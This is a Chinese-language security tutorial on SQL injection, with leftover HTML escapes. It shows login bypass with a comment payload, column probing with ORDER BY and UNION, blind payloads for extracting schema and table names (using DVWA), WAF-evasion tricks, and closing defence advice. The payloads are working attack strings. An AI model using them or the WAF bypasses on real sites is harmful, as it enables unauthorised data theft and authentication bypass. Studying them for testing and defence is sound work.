SQL注入攻击技术详解：Payload与WAF绕过方法<\/h1>

一、SQL注入的安全隐患<\/h2>
SQL注入漏洞可能导致以下严重后果：<\/p>
数据库信息全部被窃取<\/li>
数据库内容被篡改<\/li>
登录认证被绕过<\/li>
服务器文件被读取或修改<\/li>
服务器程序被执行<\/li> <\/ul>
二、SQL注入原理与示例<\/h2>

基本注入原理<\/h3>
典型登录SQL语句：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> username=<\/span>'farmsec'<\/span> AND<\/span> password=<\/span>'123456'<\/span>
<\/span><\/span><\/code><\/pre>攻击者可通过注入用户名或密码字段修改查询逻辑。例如使用用户名：<\/p>
farmsec' --
<\/code><\/pre>
实际执行的SQL变为：<\/p>
SELECT<\/span> *<\/span> FROM<\/span> users WHERE<\/span> username=<\/span>'farmsec'<\/span> --' AND password='sadfas'
<\/span><\/span><\/span><\/code><\/pre>注释符(--)使密码检查失效，从而绕过认证。<\/p>
三、SQL注入探测技术<\/h2>
1. 确定字段数量<\/h3>
使用ORDER BY<\/code>探测：<\/p>
1<\/span>' ORDER BY 1--+
<\/span><\/span><\/span>1'<\/span> ORDER<\/span> BY<\/span> 2<\/span>--+
<\/span><\/span><\/span><\/span>1<\/span>' ORDER BY 3--+
<\/span><\/span><\/span><\/code><\/pre>使用UNION SELECT验证：<\/p>
1<\/span>' AND 1=2 UNION SELECT 1,2,3--+
<\/span><\/span><\/span><\/code><\/pre>2. 报错特征识别<\/h3>
MySQL典型报错信息：<\/p>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
<\/code><\/pre>
四、常用Payload分类<\/h2>
1. 显注Payload<\/h3>
1<\/span>' AND 1=1#
<\/span><\/span><\/span>1'<\/span> OR<\/span> 1<\/span>=<\/span>1<\/span>#<\/span>
<\/span><\/span>\/*!500001'*\/<\/span>  -- 报错型，不常用
<\/span><\/span><\/span><\/span>\/^<\/span>.*<\/span>1<\/span>'*\/      -- 报错型，不常用
<\/span><\/span><\/span><\/code><\/pre>2. 盲注Payload(Burp Intruder适用)<\/h3>
用户信息探测：<\/p>
1<\/span>' AND LENGTH(USER())=14#
<\/span><\/span><\/span>1'<\/span> AND<\/span> SUBSTRING<\/span>(USER<\/span>(),1<\/span>,1<\/span>)=<\/span>'a'<\/span>#<\/span>
<\/span><\/span><\/code><\/pre>数据库信息探测：<\/p>
1<\/span>' AND LENGTH(DATABASE())=4#
<\/span><\/span><\/span>1'<\/span> AND<\/span> SUBSTRING<\/span>(DATABASE<\/span>(),1<\/span>,1<\/span>)=<\/span>'a'<\/span>#<\/span>
<\/span><\/span><\/code><\/pre>五、分步注入技术<\/h2>
1. 注入库名<\/h3>
查询数据库数量：<\/p>
1<\/span>' AND (SELECT COUNT(schema_name) FROM information_schema.schemata)=6#
<\/span><\/span><\/span><\/code><\/pre>查询第一个库名长度：<\/p>
1<\/span>' AND LENGTH((SELECT schema_name FROM information_schema.schemata LIMIT 0,1))=18#
<\/span><\/span><\/span><\/code><\/pre>
LIMIT用法：<\/p>

LIMIT 0,1：第一行<\/li>
LIMIT 0,2：前两行<\/li>
LIMIT 1,1：第二行<\/li>
LIMIT 2,3：第三到第五行<\/li>
<\/ul>
<\/blockquote>
查询第一个库名字符：<\/p>
1<\/span>' AND SUBSTRING((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)='<\/span>i'#
<\/span><\/span><\/span><\/code><\/pre>或使用ASCII码：<\/p>
1<\/span>' AND ASCII(SUBSTR((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1))=105#
<\/span><\/span><\/span><\/code><\/pre>2. 注入表信息<\/h3>
查询指定库中的表数量：<\/p>
1<\/span>' AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='<\/span>dvwa')=2#
<\/span><\/span><\/span><\/code><\/pre>六、WAF绕过技术<\/h2>

注释混淆<\/strong>：使用\/*!50000*\/<\/code>等特殊注释<\/li>
编码混淆<\/strong>：使用十六进制、URL编码等<\/li>
大小写混合<\/strong>：如SeLeCt<\/code>代替select<\/code><\/li>
空白符替换<\/strong>：使用%09<\/code>(制表符)、%0A<\/code>(换行)等<\/li>
等价函数替换<\/strong>：如用MID()<\/code>代替SUBSTRING()<\/code><\/li>
内联注释<\/strong>：\/*!SELECT*\/<\/code>形式<\/li>
<\/ol>
七、防御建议<\/h2>

使用参数化查询(预编译语句)<\/li>
实施最小权限原则<\/li>
对输入进行严格过滤和验证<\/li>
使用Web应用防火墙(WAF)<\/li>
定期进行安全审计和渗透测试<\/li>
错误信息处理：不显示详细数据库错误<\/li>
<\/ol>
通过掌握这些SQL注入技术和防御方法，安全人员可以更好地评估和保护Web应用安全。<\/p>